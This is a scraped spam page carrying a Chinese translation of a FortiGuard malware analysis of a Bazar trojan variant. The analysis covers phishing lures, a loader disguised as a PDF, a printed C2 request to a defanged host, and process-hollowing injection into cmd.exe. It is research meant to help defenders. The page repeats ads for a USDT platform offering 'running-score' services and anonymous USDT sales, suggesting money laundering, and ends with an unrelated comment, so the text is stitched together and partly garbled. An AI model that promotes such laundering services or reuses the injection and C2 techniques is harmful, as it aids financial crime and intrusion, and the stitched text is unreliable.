菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

首页科技正文

usdt支付平台(www.caibao.it):新的Bazar 木马变体正通过最近的 *** 钓鱼流动放肆流传(一)

admin2021-02-1993资讯

USDT自动充值API接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

新的Bazar 木马变体现在针对的攻击平台是Microsoft Windows,以是受影响的用户是Windows用户,现在攻击者可以从受害者的装备控制和 *** 敏感信息以及流传其他恶意软件,现在研究人员已经将此攻击的严重级别定级为严重。

Bazar(由Trickbot背后的小组开发,被归类为Team9恶意软件家族)是一种后门特洛伊木马,旨在针对装备, *** 敏感信息,通过下令控制系统并流传恶意软件。去年,该小组就被发现流传了恶意软件TrickBot。

FortiGuard实验室最近通过SPAM监视系统注重到了一封可疑电子邮件,该电子邮件旨在诱使受害者打开网页以下载可执行文件。对此可执行文件的其他最新研究发现,它是Bazar的新变体。在本文中,你可以领会到Bazar使用哪些新技术举行反剖析,若何与C2服务器通讯,可以从受害者的装备 *** 哪些敏感数据以及若何将其他恶意软件流传到受害者的系统。

*** 钓鱼电子邮件和下载页面

为了验证研究人员的推测,他们捕捉了Bazar以前的某些 *** 钓鱼电子邮件,它们的内容是相似的。都是诱使吸收者打开一个网页,以查看虚伪的奖金讲述,虚伪的客户投诉讲述或虚伪的帐单等的pdf版本。你可以在下图中看到两个示例,这些示例划分于2021年1月20日和1月27日划分被捕捉。

2021年1月20日捕捉的Bazar *** 钓鱼电子邮件

2021年1月27日捕捉的Bazar *** 钓鱼电子邮件

一旦受害者点击电子邮件中的任何超链接,就会将受害者重定向到一个恶意网页,如下图所示。

下载Bazar恶意软件的网页

上面的网页图像中圈出了三个超链接,它们都指向统一下载链接。下载超链接的一个实例如下所示:

https[:]//doc-14-6g-docs[.]googleusercontent.com/docs/securesc/m4jlrke7n9hladu0avuh39vorb58jrve/fgl9fo0g0p5o35at5vboiccqq552hmqf/1611168150000/16223329070176251062/11832846407481787782/1XjBjtKzYGKE1BZDg-8ISzpp4XoG-jfSs?e=download&authuser=0&nonce=nvmpahs236rou&user=11832846407481787782&hash=5ctf3a9bet7iv3njj965vh0c16pumigi

下载Bazar的工具

下载的文件(Priview_report20-01[.]exe)是一个可执行文件,使用类似PDF文档的图标来诱骗预期的受害者。默认情况下,Windows隐藏现实的扩展名(例如," .exe ")。

下图显示了对该文件的快速剖析,图像的左侧显示了受害者看到的内容,右侧显示了研究人员在PE剖析工具中看到的内容。PE或可移植可执行文件是MicrosoftWindows®32位操作系统的可执行二进制文件[DLL,驱动程序和程序]的本机花样。

在剖析工具中下载的Bazar加载程序

受害人可能以为该文件是一个真实的PDF文档,然后双击该文件以打开“讲述”,而没有意识到可执行文件正在后台运行。

下载的可执行文件在剖析工具中被识别为64位文件,这意味着它只能在64位Microsoft Windows操作系统上执行。

在剖析了该文件之后,研究人员意识到该文件是Bazar的加载程序。

Bazar加载程序启动后,将隐藏在“字体目录”中且ID为“339”(十六进制153H)的加密资源加载到其内存中。在下图中,你可以看到剖析工具中显示的资源数据。

,

Usdt第三方支付平台

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,

Bazar加载程序的加密资源339

解密资源数据会发现一段A *** (汇编语言)代码和一个PE文件,Bazar加载程序挪用此A *** 代码,将PE文件动态部署到内存中并执行它。下图是调试器的屏幕截图,显示了A *** 代码将在那边挪用已部署PE文件的OEP(原始入口点),该PE文件是真正的Bazar加载程序。

挪用已部署的PE文件的OEP

深入领会Bazar下载程序

然后,真正的Bazar加载程序将启动与其C2服务器的通讯,以下是研究人员从该客栈中的常量数据解密主机和URL字符串。

显示C2服务器的解密主机字符串

上图显示了刚刚解密的C2主机字符串,其内存子窗口中带有端口号(englewoodcarwashh [。] us:443)。稍后,它将挪用API getaddrinfo(C2_host_string)以获取C2服务器的IP地址。

它使用SSL协议将带有URL“/cgi-bin/req5”的GET请求发送到其C2服务器,下图是一个调试器的屏幕快照,显示了它将要挪用API EncryptMessage()来加密整个GET请求的时刻。

发送给C2服务器的加密数据包

我复制了下面的数据包以利便查看更清晰的视图:

GET /cgi-bin/req5 HTTP/1.1
 Host: englewoodcarwashh[.]us
 User-Agent: user_agent
 Date: Wed, 20 Jan 2021 21:05:11 GMT
 rvpoft: z3qTFLIkBrYVD3igIKy1kAS99rBL0V35k8NKFUG1dQGVw4ICpFV8y9cAiVS%2FAu6RTpaHgZRVuWMsnLVhpTZaRMdnvCDvJrOqKhawD1tGooNxMjZZnR5Q%2FC0r *** Ya5ErdDZcN7UWqCAw5xmvt%2Fcq020hGeRTxJ02eUcqzJ5U0Ux2QKtWQdv7RNMVZ6j8tHBSb0tfUwZjAwbSJaNdikJ83WZ7hhSFtG8FXPqMdfYl8E6fjVTzP7VY4KYoVvOyZN228qet2VdoEorNx%2FnD2nsa3AcG5cmjpi4g%2F%2FM6SBCm1WTkwe6V2e00Y%2BdN%2BxWIjwtakTAoi3VD2OUZC3gjZ%2BiEAvw%3D%3D
 Connection: Keep-Alive

你可能已经注重到,“rvpoft”的值是用base64编码的。它是“date:”值(“Wed, 20 Jan 2021 21:05:11 GMT”)的哈希值。通过盘算“Date:”的哈希值,并将其与“rvpoft”在C2服务器上携带的哈希值举行对照,就可以验证数据包是否来自其真正的客户端。

从C2服务器返回的解密后的Bazar有效载荷

一旦通过数据包验证,C2服务器便将加密的Bazar有效载荷回复给客户端(Bazar加载程序)。这在由Bazar加载程序挪用的API函数BCryptDecrypt()中被解密。上图在底部的内存子窗口中显示了刚刚解密的Bazar有效载荷PE文件。

有效载荷文件是一个EXE文件,它将被注入到新建立的“cmd.exe”历程中,以隐藏其现实历程,以免被受害者注重到。为此,Bazar加载程序挪用API CreateProcessA()来建立一个“cmd”历程,其CreateFlags值为“0x80014”,它是“EXTENDED_STARTUPINFO_PRESENT, CREATE_NEW_CONSOLE, CREATE_SUSPENDED”的组合,更多细节请参见下图。

通过挪用API CreateProcessA()建立“cmd.exe”历程

要将Bazar有效载荷注入到新建立的“cmd.exe”历程中并执行它,它需要挪用一些相关的API,例如NtGetContextThread(),VirtualAllocEx(),NtUnmapViewOfSection(),NtWriteVirtualMemory(),ZwSetContextThread(),和ZwResumeThread()。

总结

这是研究人员对这种新的Bazar变体举行剖析的第一部门,在本文中,研究人员注释了若何在 *** 钓鱼流动中流传Bazar下载程序。研究人员先容了Bazar下载程序若何与其C2服务器通讯以下载Bazar有效载荷,除此之外还先容了若何在新建立的“cmd.exe”历程中部署有效载荷文件。

我将在此剖析的第二部门中提供对运行在“cmd.exe”中的Bazar有效载荷文件的剖析。在下一篇文章中,你将领会Bazar若何与其C2服务器通讯,以及Bazar可以通过从C2服务器吸收的下令在受害者的装备上执行哪些操作。

本文翻译自:https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I:

网友评论

1条评论
  • 2021-03-01 00:00:14

    现在83岁的他近年仍异常活跃,好比出演HBO热剧《西部天下》,上届他以《教宗的承继》入围奥斯卡最佳男配,本次颁奖季也有新片《父亲》介入角逐。看这个最爽了